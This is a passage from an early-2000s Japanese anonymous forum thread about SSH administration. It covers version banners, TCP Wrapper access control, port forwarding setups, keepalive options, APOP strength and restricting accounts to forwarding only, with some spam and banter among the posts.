うう、ご丁寧にありがとうございます。これでも通りました。


495 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/26 16:16
SSHのバナーを変える(消す)のってどうやるの?
SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、
SSH1だと使えないですか?

496 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/26 17:52
>>495
> SSHのバナーを変える(消す)のってどうやるの?

何を指してバナーと呼んでいる?

> SSH2だとBANNERっていうパラメータがsshd_configにあるみたいだけど、

この Banner という config option は設定すると

local$ slogin remote
逝ってよし
Last login: Thu Dec 26 17:42:38 2002 from *****.*******.***
remote$

てな感じで遊べる、というだけの代物で、デフォルトでは設定されちゃ
いないからあえて消す必要はない筈なんだが。


497 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/26 18:08
>>496
TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。
これが気持ち悪いので消したいのですが。


498 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/26 18:46
>>497
> TCP/22をtelnetで叩くとSSHとOSのバージョンが出てきます。

正しくは SSH Protocol と Software のバージョン、ね。

♯ま、OS のバージョンまで入れてる variant がないとは言えないだ
♯ろけど。

> これが気持ち悪いので消したいのですが。

server/client 間のネゴに必要な情報なので消しちゃダメだし、ソー
スいじって recompile でもしない限りは変えられない。


499 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 00:18
>>498
>server/client 間のネゴに必要な情報なので消しちゃダメだし、
あ、これ見てるのか。じゃ消しちゃダメですね。

ちなみにうちではこう表示されてます。
>SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702

500 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 01:08
>>498
>>499
ソースいじってそれ(>>499の例では「OpenSSH_3.4p1 FreeBSD-20020702」の部
分)を消し、recompile すると正常に動作しなくなったとかいう話がどっかの雑誌
に載ってたような気がします。
# これに関しては
#  http://www.openssh.com/txt/draft-ietf-secsh-transport-14.txt
# の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
# の兼ね合いのために存在するっぽい?

ちなみに、>>499の例でいう「SSH-1.99」の部分はどのバージョンのSSHプロトコル
で通信する(orできる)かを相手に伝えるためのもの。消すと一切通信できなくなり
ます(藁)
# >>497(=>>499)氏はクラッカー共に余計な情報を渡したくないと思ったのかな。


501 名前:497 メール:sage 投稿日:02/12/27 07:12
>>500
># の「3.2 Protocol Version Exchange」に書かれてますな…過去のバージョンと
># の兼ね合いのために存在するっぽい?
RFCに書いてあるんじゃしょうがないですね。

># >>497(=>>499)氏はクラッカー共に余計な情報を渡したくないと思ったのかな。
そうなんですが。
ラッパーではじいたIPからつないでも、この文字列だけは出てきちゃうんです。


502 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 07:43
>>501
> ラッパーではじいたIPからつないでも、この文字列だけは出てきちゃうんです。
「ラッパーで」って具体的に何よ? TCP Wrapperか??
あと、「はじいた」つもりでも実際ははじかれていないような気も…

503 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 07:45
>>501
そんなに嫌がるならパケットをフィルタしちゃえば。
ラッパーで弾くならフィルタリングも出来るよね。


504 名前:503 メール:sage 投稿日:02/12/27 07:49
>>502
なんか台無しにするようなコメントになってしまったか。すまそ。


505 名前:502 メール:sage 投稿日:02/12/27 08:03
「はじく」=「TCP Wrapperなどでアクセス制限をかける」と考えてたんだが、
もしそうなら>>501の「この文字列だけは出てきちゃうんです」が意味不明。
 →実はアクセス制限がかかっていなかった(はじかれてなかった)、というオチか?

% telnet サーバのホスト名 22
してその文字列が表示されるってことかい?>>501

>>501氏の「はじく」ってまた別の意味か??

>>503 (゚∀゚)キニスルナ

506 名前:502=505 メール:sage 投稿日:02/12/27 08:07
>>505
> % telnet サーバのホスト名 22
> してその文字列が表示されるってことかい?>>501

スマソ、>>497に書いてあったね。鬱氏

507 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 09:57
>>501
sshdをinetdから起動するようにすると、
libwrapではじかれたとき、何も出ないようになりませんか。

508 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 10:16
>>507
inetd から起動しなくても
libwrap ではじかれると何も出ないね。

509 名前:495=497=499=501 メール:sage 投稿日:02/12/27 10:32
>>502 >>505
TCP Wrapperでアクセス制限しています。
lddで確認したらlibwrapにリンクしてましたし、
実際、拒否IPからsshでつなぎにいくと弾かれます。

で、同じく拒否IPから-vオプション付けて試してみたら、

debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Rhosts Authentication disabled, originating port will not be trusted.
debug1: ssh_connect needpriv 0
debug1: Connecting to xxx.xxx.xxx.xxx [xxx.xxx.xxx.xxx] port 22.
debug1: Connection established.
debug1: identity file /home/hoge/.ssh/identity type 0
ssh_exchange_identification: Connection closed by remote host

と、コネクションを張った後(つまりバージョンネゴシエーション
が完了した後?)、認証を始める段階になって弾かれているようでした。

常駐daemonの場合、inetdからの起動と違ってサーバプロセスの
起動自体を制限してるわけではないから、というのがビンゴでしょうか?

>>503
>そんなに嫌がるならパケットをフィルタしちゃえば。
>ラッパーで弾くならフィルタリングも出来るよね。
なわけで素直にフィルタかけようと思います。
お世話様でした。



510 名前:495=497=499=501=509 メール:sage 投稿日:02/12/27 10:39
>>508
>inetd から起動しなくても
>libwrap ではじかれると何も出ないね。
え、そうなんですか。
ひょっとして変なソース掴まされてるとか (((;゚Д゚))ガクガクブルブル


511 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/27 15:52
♯昨夜試しに Banner option 設定したのを忘れて、今朝よそからログ
♯インしたらいきなりマシンに『逝ってよし』と言われて激しく鬱。

>>509
> で、同じく拒否IPから-vオプション付けて試してみたら、
> <snip>
> と、コネクションを張った後(つまりバージョンネゴシエーション
> が完了した後?)、認証を始める段階になって弾かれているようでした。

上で言ってる Connection established. は TCP レベルでのコネクショ
ンのことなので SSH レベルでのバージョンネゴはまだその先。

で、sshd のソースを見る限りでは、LIBWRAP が有効な場合 TCP コネ
クション確立とバージョンネゴの間で切断されるようになってるから、
サーバのバージョンは表示されない筈。やっぱなんか動きが変かも。

手元のソースは OpenBSD のなんで、FreeBSD だとその辺が違ってる可
能性はあるかもしれんが…。


512 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/27 17:08
>>509
> TCP Wrapperでアクセス制限しています。
どんなふうに?

513 名前:509 メール:sage 投稿日:02/12/27 17:17
sshdをいったん殺して再起動したら表示されなくなりました。
HUPシグナルじゃだめだったんでしょうか。

激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

514 名前:名無しさん@XEmacs メール:sage 投稿日:02/12/27 18:32
>>513
> sshdをいったん殺して再起動したら表示されなくなりました。
> HUPシグナルじゃだめだったんでしょうか。

うんにゃ。HUP シグナルを送るのは sshd を再起動するのとまったく
同じ効果がある (というか HUP が送られたときに行なわれる処理は再
起動そのもの。see sshd(8))。

あと、単に /etc/hosts.deny に新しくホストを追加するくらいなら別
に再起動 (したり HUP シグナルを送ったり) する必要はない。

> 激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

つーこって、吊るこたぁないが、なにか間違ってたのもたしかなんだ
ろうなぁ、きっと。


515 名前:名無しさん@お腹いっぱい。 投稿日:02/12/29 16:31
くそ厨房質問で申し訳ないのですが…

client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www
といった構成で、clientからhostAにsshかけて外部へパケットを飛ばすことを考えています。
localhostのポートをhostAのポートにフォワーディングすればいいのかな?
と思って、とりあえず8080を80に、とかやってみたんですけど、
転送要求が拒否されたとか言われました。
これは、考えが間違っているんでしょうか、それともhostAの方で塞がれているんでしょうか?
アドバイスお願いいたします。

516 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/29 16:42
>>515
もっと具体的に書け。


517 名前:515 投稿日:02/12/29 16:57
細かいhost名とかは晒せませんが…
とりあえずteratermproで実験してみました。
ssh転送で、localhostの8080をhostAの80に飛ばして、
IEのproxyでlocalhost:8080をproxyに指定。…だめでした。(転送要求が拒否されたと出る。)
といったかんじなのですが。

#普段mozillaしか使っていないので嫌われたか?(ぉぃ

518 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/29 17:05
hostA:80 では何が動いてるのですか?

519 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/29 17:55
>>517
そりゃそうだろ。hostA:80にproxyとしての要求を出しているんだから。


520 名前:515 投稿日:02/12/29 18:01
>>518
何といわれても…デーモンとかのことですか?

>>519
あ、やっぱりですか。でも、今ひとつ何をすればいいのかわからんのです。

むぅ…はぁ〜さっぱりさっぱり。

521 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/29 18:19
>>515
目的は何なのよ。

522 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/30 01:23
>>515

hostA で delegate とか動かす必要があるのでは?



523 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:02/12/30 02:14
client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
かな。

524 名前:523 メール:sage 投稿日:02/12/30 02:19
ん、TeraTermか。
hostAにログインしておいて"SSH Port Forwarding"のところで、
 Forward local port: [8080]
 to remote machine: [www] port: [80]
これでどーよ。

525 名前:515 メール:sage 投稿日:02/12/30 14:49
質問していながら申し訳ありません、
これからIPunreachableな田舎へ引っ込むため、
年明けにでももう一度考え直してみます。
返信ありがとうございました。

526 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/02 13:57
cliantからhostにsshで入って、terminalにコマンドをしばらく
打たないでいると、自然に接続が切れるのですが、どうすれば、
切れないようにできるのでしょうか?

527 名前:名無しさん@XEmacs メール:sage 投稿日:03/01/02 15:24
>>526
> cliantからhostにsshで入って、terminalにコマンドをしばらく
> 打たないでいると、自然に接続が切れるのですが、どうすれば、
> 切れないようにできるのでしょうか?

・たぶん間に挟まってる NAT/NAPT 機器の変換表保持時間を長くする。
・sshd_config で ClientAliveInterval を適当な時間に設定 (ただし
 SSH2 Only)

のどっちか。


528 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/02 15:38
sshdに空パケット投げるパッチ当ててみたら?


529 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/02 16:21
X11 forwarding って何すか?
slogin して X client を立ちあげるのとは違うんですか?

530 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/02 17:36
>>527, >>528
ありがとうございます。SUN sshがhostなんで、
ClientAliveIntervalが設定できないみたいです。
でも、勉強になりました・・。OpenSSHにするという手もありますね。

531 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/02 17:51
>>529

簡単に言うと、port forward + X認証 ってとこじゃなったかな?多分。

532 名前:名無しさん@XEmacs メール:sage 投稿日:03/01/02 18:05
>>530
> ClientAliveIntervalが設定できないみたいです。

sshd に依存しない (けどすんごい野蛮な) 手として

while true; do
echo -n .
sleep 180
done &

とかいうのを login した先で走らせとく、なんてのもある。

♯これなら SSH1 でも動くから、SSH2 に移行して ClientAliveInterval
♯を知るまでは実際に使ってたことも。

533 名前:529 メール:sage 投稿日:03/01/02 19:30
>>531
解説ありがとう。
しかし勉強不足のせいで何のことだか
わかりませんでした。勉強します。
スマソ。

534 名前:名無しさん@お腹いっぱい。 投稿日:03/01/04 05:42
ssh の port forwarding で pop に接続するということは、
その pop server に sshd がインストールされていることを
前提にしている訳ですよね。
自宅サーバとか学校のサーバではない、
普通の商用プロバイダでも sshd は
用意されているものなんでしょうか。

ちなみに私は biglobe です。
実際に試してみようかとも思ったんですけど、
port scan と間違われるといけないので。

535 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 05:47
>>534
普通は無い。

536 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 05:58
ssh使いたいってことは途中の経路でパスワードや内容を見られたくないってことかな?
パスワードの暗号化にはAPOPがあるし、内容の暗号化にはPGPがある。

PCとプロバイダのメールサーバとの間でsniffされる可能性は低いと考えると、
メールソフトがPGPに対応していればとりあえず安心できるのかも。

537 名前:534 メール:sage 投稿日:03/01/04 05:59
うーむ、やっぱ普通はないですよね。
パスワードたれ流しは仕方なしか。

538 名前:534 メール:sage 投稿日:03/01/04 06:02
>>536
多少スレ違いですが、 apop の暗号は強固なものなんでしょうか。

539 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 06:23
>>538
正確に言うと、APOPはパスワードを暗号化するっーより
md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。
だからパスそのものは流してはいない。

ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか?

540 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 06:56
APOPはオートだけどPGPはオートとまでは行かず、めんどくさい。

541 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 12:44
pop3s(port 995)ってはやってないのかな......

542 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/04 13:10
>>540 そんなことないです。

543 名前:名無しさん@XEmacs メール:sage 投稿日:03/01/04 14:21
>>539
> 正確に言うと、APOPはパスワードを暗号化するっーより
> md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。

『正確に言うと』と書くんなら本当に正確に書かんと。本当にパスワー
ド*のみ*のハッシュを取ってるだけなら容易に replay できちゃう
からまったく意味なし。

で、強度という点では、大概はパスワードに引きずられるから、まぁ
よくて 30〜40bit のエントロピーってとこかしら。辞書攻撃できるよ
うなパスワード使ってたら challenge&response のサンプル数個です
ぐに破れちゃうだろうね。

> ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか?

SSH1 の RSA 認証ならたしかにハッシュを使っているけど (この辺り
に関しては前スレに解説あり)、SSH2 の公開鍵認証は全然違う。


544 名前:名無しさん@お腹いっぱい。 投稿日:03/01/10 03:11
java SSH2 terminal emulater だって。
http://wiredx.net/jcterm/


545 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/10 08:20
ttps://www.netsecurity.ne.jp/article/2/8164.html
(((;゚Д゚)))ガクガクブルブル


546 名前:名無しさん@お腹いっぱい。 投稿日:03/01/10 23:06

 T h e o 必 死 だ な (藁


547 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/11 12:16
MICKEY MOUSE HACKING SQUADRON って誰なんだ?

548 名前:名無しさん@お腹いっぱい。 投稿日:03/01/12 17:27
Windows2000 → FreeBSD4.7R で ssh を使って接続しています。
ところが、最近表示が詰まるようになってしまいました。
画面の上から 10 行目あたりで一度止まって残りが表示される感じです。
(ちょっと昔に ssh 対応 の TeraTerm3 が発表され、この板の住人で
使った人が"なんか表示が詰まらない?" のような感じに表示がなります。)

何が原因なのか

Putty ssh
Putty telnet
TeraTerm (telnet)
ttssh (ssh)

でそれぞれ接続してみたところ、 ssh で接続した時にこの現象が出るようです。
最近、 ssh 関係の設定もハードウェアも変えていません。ロードアベレージも
限りなく 0.00 に近いです。
何か心辺りがある方は御一報下さい。

sshd version OpenSSH_3.4p1 FreeBSD-20020702


549 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 18:08
>>548
Compression no とか?

550 名前:名無しさん@お腹いっぱい。 投稿日:03/01/12 21:08
OpenSSHにセキュリティホールがあったという事件で、
SSH系は、すっかり信用を落としてしまいましたね。
もっと単純明快なソフトの書き方にしないかぎり、
これもまた常にもうひとつバグがあるの繰り返しかな。
SSHのバグはこればかりじゃなくて過去にも何度も
出ています。

それにしても、そろそろUNIXに最初から裸のTELNETとか
FTPとかR系コマンドとかSENDMAILが入らなくなって
しかるべきで、これらのコマンドはあっても必ず、
マシン外部から出て行くときにはパケットが暗号化
されるようにはやくなりませんかな。

551 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 21:21
telnetは問題ないだろ。つーか、無くなると手でポート叩く時に困る。

552 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 21:45
典型的なFUDですな。

553 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 21:50
>550はFUD
550はDQN

554 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 22:14
(´-`).。oO(>>550にSENDMAILが入っているのはなんでだろ?)

555 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/12 23:05
>>550
どこからのコピペ?

556 名前:548 メール:sage 投稿日:03/01/12 23:15
>>549
Compression no
を/etc/ssh/sshd に追加後、kill -HUP sshd して再接続しましたが変化ありませんでした。

557 名前:548 メール:sage 投稿日:03/01/12 23:34
NIC の Driver 入れ直したら改善して模様。

558 名前:名無しさん@お腹いっぱい。 投稿日:03/01/13 06:35
ssh のポートフォワードの機能だけを使わせたい素人の友人がいるのですが、怖いのでシェルは使わせたくありません。
どうでもいい IDをつくってログインシェルに
ssh -R port:host:hostport #ssh のポートフォワードの自動実行
alias *=exit # 何かキーを押したらログアウト

見たいな記述をしておけば、IDとパスワードを教えても大丈夫でしょうか? というよりこの状態でイタズラできる方法ありますかねぇ?

559 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 07:22
>>558 も素人。


560 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 08:35
>>558
ログインシェル変えればいいじゃん。

561 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 08:46
>560
alias で * とかなってんじゃないの?

>558
サーバー側でポートフォワードを許す設定になっているなら putty とかでログイン時にイタズラできない? 
ftp とか netbiosとか sambaにポートフォワードする設定にしてログイン。 その後 samba にアクセスとか。
てーかSSHがあれば対象のIPさえわかれば LAN内のどこにでもポートフォワードでアクセスできると思われ。

562 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 09:04
ログインできないようにしてpermitopenを使えばよろしいね。

563 名前:558 メール:sage 投稿日:03/01/13 09:31
>561 >562
なるほど。 そんなこともできるんですね。 怖い怖い。
とりあえず試してみたのですけど alias の記述で * は認めないみたいなのでどうしたもんだろって感じです。
PATH を何にも通さなくして ~/ にexit だけを置いてみたんですけどやっぱり誰かが /bin/ とか絶対番地入力に気がつくだろうなぁ・・・

564 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 09:40
「番地」って、、、(;´Д`)

565 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 10:00
>>562
no-x11-forwarding,no-agent-forwarding,no-pty あたりもあったほうがよいでしょうか?


566 名前:562 メール:sage 投稿日:03/01/13 10:13
>>563
ぜんぜんわかってないご様子ね。やめたほうがいいっす。
今までのことはすべて忘れて windows を使っててください。

>>565
-NをつけてればagentもXも転送されないので、とくにつける必要ないです。
ログインできなければptyも関係ないし。

567 名前:558 メール:sage 投稿日:03/01/13 10:46
>562
わかってないけど忘れるのは無理。
とりあえずもっと勉強してきます。

568 名前:初期不良 メール:sage 投稿日:03/01/13 14:27
>>567
stunnel の方がいいんでないのかい

569 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/13 15:53
zebedee






と言ってみるテスト

570 名前:山崎渉 メール:(^^)sage 投稿日:03/01/15 12:53
(^^)

571 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/16 19:49
authorized_keysでcommadn="command"の制限をしたいとき,
実行したいコマンドが複数ある場合どうすんの?

# dump -0 -a -f - /home | ssh -l user server "cat | gzip -c > /path/home.gz"
# dump -0 -a -f - /usr | ssh -l user server "cat | gzip -c > /path/usr.gz"
とかいうのをしたいのよね。


572 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/16 21:56
>571
暗号化せず、日本語で書いてください

573 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/17 12:18
>>572
> >571
> 暗号化せず、日本語で書いてください

意味不明。
日本語を書くこと。

574 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/17 12:22
>>573
なんだコイツ、日本語で書けよな。

575 名前:(;´Д`)ハァハァ メール:sage 投稿日:03/01/17 14:07
572 はネタのつもりだったんじゃない? 一応暗号化関連のスレだし。

576 名前:(;´Д`)ハァハァ 投稿日:03/01/17 15:55
上の方にでていたTeraTerm のSSH2対応版を使っているのですがポートフォワードができなくて困ってしまいますた。
で、TTSSHだとできるのに・・・ 誰かできた方はいますか?

577 名前:名無しさん@お腹いっぱい。 投稿日:03/01/17 16:34
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!
ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!ねぎマンセー!!

578 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/17 17:40
解読できません。

579 名前:名無しさん@XEmacs メール:sage 投稿日:03/01/17 17:59
>>571
> authorized_keysでcommadn="command"の制限をしたいとき,
> 実行したいコマンドが複数ある場合どうすんの?

実行したいコマンド毎に別の鍵ペア用意して -i で使い分ければ?


580 名前:名無しさん@お腹いっぱい。 投稿日:03/01/17 18:12
windows機でsshサーバをたちあげようとする時、現状では
cygwinしか選択肢は無いのでしょうか?
ぐぐってみても、windows用はクライアントしか引っかからない…

581 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/17 18:15
>>580
ssh.com にはないの?

582 名前:名無しさん@お腹いっぱい。 投稿日:03/01/17 18:17


http://www.agemasukudasai.com/bloom/

583 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/17 18:17
>>580
有料のとかあったはず

584 名前:580 メール:sage 投稿日:03/01/17 18:31
どうもありがとうございます
>>581
>>583
すみません、できれば無料のを探しているのです…
ssh.comのは評価版なんですよね?むむむ…
おとなしくcygwinを入れた方が良いのかな?
Diskがやばいのでなるべく小さなのを入れたかったのですが…
もう少し探して見ます。どうもありがとうございました。


585 名前:571 メール:sage 投稿日:03/01/17 19:55
>>579
ども。その手があったか。


586 名前:名無しさん@お腹いっぱい。 投稿日:03/01/19 11:37
>>584
cygwin sshdの解説はここがわかりやすい。ここ見れば一発だ。
http://osksn2.hep.sci.osaka-u.ac.jp/~naga/miscellaneous/winssha.html

587 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/19 13:34
>>586
そのサイト、あちこちに気になる記述が。

588 名前:名無しさん@お腹いっぱい。 投稿日:03/01/19 18:52
515的な発想なんだけど、
client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www(不特定のHOST)
の場合、つまりポートフォアーディングでウェブを参照したいとき、
やはり、proxyを経由じゃないとだめなんでしょうか?

wwwが特定のHOSTの場合は参照できることを確認済みです。
動的に転送先を変えるみたいなことはやはり不可能?


589 名前:588 投稿日:03/01/19 18:58
もうひとつ質問させてください。
client---<sshのみ可能>---hostA ---<sshのみ可能>---hostB
のときhostBにポートフォアーディングしたときは
hostAでclientのポート22をhostBに転送し、clientにsshする。
(実際はhostBにsshすることになる)
その後、clientの任意のportをポートフォアードする。
これで一応可能みたいなんだけど、これって問題ない?



590 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/19 19:30
>>588-589
??
要点を整理して書き直してください。

591 名前:588 投稿日:03/01/19 20:16
上にあるように
client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
で特定のHOSTはOKなのですが、これを不特定にしたい。
つまりwwwを動的に書き換えたい。
普通に考えれば
client% ssh hostA -L 8080:proxy:8080
としてブラウザのプロキシをproxy:8080にすれば可能だと思います。
proxyサーバ経由しない方法ってないですか?
やっぱり無理ですよね?



592 名前:589 投稿日:03/01/19 20:21
client% ssh hostA -L 23:hostB:23
とした後、
client% ssh localhost
でログインし
hostB%ssh localhost -L port:hostX:port
とします。
するとclientの任意のportをhostXに転送できるのです。
これ問題ない?


593 名前:bbb 投稿日:03/01/19 20:22
http://www6.ocn.ne.jp/~endou/index2.html
     ★YAHOOOプロフィール★

594 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/19 21:12
>>592 できない。

595 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/19 21:14
>>591
そのままでは無理です。
hostAにsquid等のhttp proxyを立てられる権限を持っているなら、
proxyがlistenしているポートをclient側にforwardして、
clientのブラウザでforwardされたlocalhost:<port>をproxyとして指定すれば可能と思われます。

sshのみでhttpの接続先ホストを動的に変えるのはほぼ無理です。
どうやってhttpの接続先アドレスをhostAに渡すのか考えてください。


>>592
やはり意味不明です。
もう一度よく考えて書き直してください。

596 名前:588=589 投稿日:03/01/19 21:37
>>595
591はproxy:8080をlocalhost:8080と間違えてかいてました。
 おっしゃるとおりにできることは確認ずみ。
 無理だと思うからあえて聞いてみたいんですけど。。
 動的にまではいかなくても、簡単に書き換えられるスクリプトでもあるかなと思って。。


 592は要するに2段先ののGWへポートフォワーディングしたいんですよ。
 もちろん、途中はsshしか許可されてない。
 ちなみにwinなひとなんで、592の表現は誤っていたかかも。
 こちらもできることは確認済み。
 ですが、セキュリティ的に問題あるかもとおもって確認してます。
 
 

597 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/19 21:54
>>596
だいたい分かりました。
問題あるか無いかは管理方針によります。
もし危険だと思うならばport forwardを不許可にすべきでしょう。

あと -R オプションというのもあるので、そちらも man で読んでみてください。


598 名前:588=589 投稿日:03/01/19 22:16
>>592は 23じゃなくて、22でSSHのポートの誤りです。
てか、TTSSHから想像で書いたので、後から見直すと間違ってる。。

>>597
ssh(22)をポートフォアーディングすることの危険性ってどういうことが
考えられます?
そりゃー、port forwardを不許可にすることが一番簡単なんですけど。。

599 名前:588=589 投稿日:03/01/19 22:30
-R をどういう意図で出してきたのかわかりませんが、
リモート側でLISTENするのどういうときに使われるんでしょうね。
結構こわいですよね?

600 名前:名無しさん@お腹いっぱい。 投稿日:03/01/19 22:56
.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
http://www6.ocn.ne.jp/~endou/index2.html
      ★こんなサイト見つけました★

601 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/20 06:01
.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html
      ★こんなサイト見つけました★

マジネタ。わかりやすくできてる。

602 名前:名無しさん@Emacs メール:sage 投稿日:03/01/20 14:23
>>601
> マジネタ。わかりやすくできてる。

ホントだ。
でも、そのスタイルで書かれると疑うよ。(W

603 名前:588=589 投稿日:03/01/20 22:05
一応正確にかくと
client% ssh hostA -L 22:hostB:22
の後、
client% ssh localhost -L port:hostX:port
です。
もちろん、clientではsshdは起動してません。
こうするとhostBからしかアクセスできないhostXの任意のポートに
clientからアクセスできます。

604 名前:名無しさん@お腹いっぱい。 投稿日:03/01/20 23:14
>>588
テケトーな荒業だけど、
www.google.co.jpあたりにフォワードして
google様のキャッシュを利用すればたいていのページは見れますよ

605 名前:名無しさん@お腹いっぱい。 投稿日:03/01/21 00:05
>603
二重に暗号化される箇所があるけど、速度面以外は問題が無い。

606 名前:名無しさん@お腹いっぱい。 投稿日:03/01/21 13:28
A営業所とB営業所の間をインターネット経由で結んで、
A営業所にあるLANにB営業所のLANがあたかも直接スイッチハブで
つながっている一つのLANであるかのようにネットワークを構築
したいのだけど、どうやればいいの? インターネットを通すので、
暗号化を加えるのにSSHを使いたいのだけど、A営業所とB営業所
の間のルーティング情報とか任意のプロトコルのパケットが
相互に通信できないと困るんですけども。

607 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/21 13:34
>>606
http://www.google.com/search?lr=lang_ja&ie=eucjp&q=SSH+VPN+%B9%BD%C3%DB

608 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/21 13:35
VPN 張りたいなら SSH にこだわる必要もないと思うが。

609 名前:名無しさん@お腹いっぱい。 投稿日:03/01/21 14:06
トンネル通ったパケットの送信元アドレスを変えることってできない?
送信元がダイナミックに振られるppp0のアドレスになるから、アクセス制御が大変で。。。

610 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/21 17:01
>>609
-b

611 名前:名無しさん@お腹いっぱい。 投稿日:03/01/21 18:35
$ssh -L8080:host-a:8080 -b 192.168.0.1 host-a
bind: 192.168.0.1: Cannot assign requested address

とか言ってできない

612 名前:610 メール:sage 投稿日:03/01/23 09:28
>>611
あぁ、トンネルの向こう側か。 man 眺めた限りだとちょっとわかんないや。スマソ

613 名前:名無しさん@お腹いっぱい。 投稿日:03/01/23 19:07
keychainの--clearオプションの使い方がいまいち分かりません。

あまりログインしない鯖上で、rsync -e sshをcronで回すことを想定しているんですけども、
ttp://www-6.ibm.com/jp/developerworks/linux/011130/j_l-keyc2.htmlによると
こういった場合、--clearを使うとなにか効用があるような感じなんですが、具体的には
どうすればいいんでしょうか。


614 名前:名無しさん@お腹いっぱい。 投稿日:03/01/24 02:40
sshd は inetd 経由でなくても
hosts.allow, hosts.deny を参照するようですが、
普通これらのファイルは inetd 用であるという認識であってますか?

615 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/01/24 03:32
>>614
いいえ。 libwrap (tcpwrappers) 用です。 OpenSSH はデフォルトでリンクしてます。
inetd も、libwrap をリンクしていなければ /etc/hosts.* を見ませんよ。

616 名前:614 メール:sage 投稿日:03/01/24 04:07
>>615
なるほど。勉強になりました。
ありがとうございます。

